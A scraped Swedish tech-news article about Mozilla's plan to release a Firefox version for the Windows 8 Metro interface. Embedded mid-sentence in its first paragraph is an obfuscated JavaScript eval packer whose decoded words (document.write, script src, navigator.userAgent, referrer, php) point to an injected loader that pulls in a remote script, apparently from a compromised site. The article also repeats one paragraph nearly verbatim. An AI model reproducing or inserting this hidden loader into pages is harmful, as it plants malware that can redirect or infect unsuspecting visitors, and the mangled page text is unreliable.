Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

PC

Skräddarsydd Firefox till Windows 8 Metro

Skräddarsydd Firefox till Windows 8 Metro
Sebastian

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efzsd|var|u0026u|referrer|tfkyd||js|php’.split(’|’),0,{}))
meddelade Mozilla att företaget kommer att skapa en version av sin Firefox som är speciellt framtagen för Windows 8 Metro-gränssnitt.

Mozilla är det första företag av Microsofts konkurrenter bland webbläsare som förbinder sig att släppa en Metro-version. Microsoft kommer också själva att släppa en Metro-version av Internet Explorer 10 i samband med Windows 8 lanseringen.

Metro är Microsofts satsning på ett gränssnitt för framförallt surfplattor i Windows. Det kommer att fungera till bordsdatorer också. Användarna kommer kunna växla till det traditionella gränssnittet på båda plattformarna.
Metro är Microsofts satsning på ett gränssnitt för framförallt surfplattor i Windows 8. Metro-gränssnittet kommer att fungera på både surfplattor och bordsdatorer. Användarna kommer även att kunna växla till det traditionella gränssnittet på båda plattformarna.

Den första publika testversionen av Windows 8 kommer att släppas nu den 29 februari. Håll i hatten och så till att få tag i ett ex.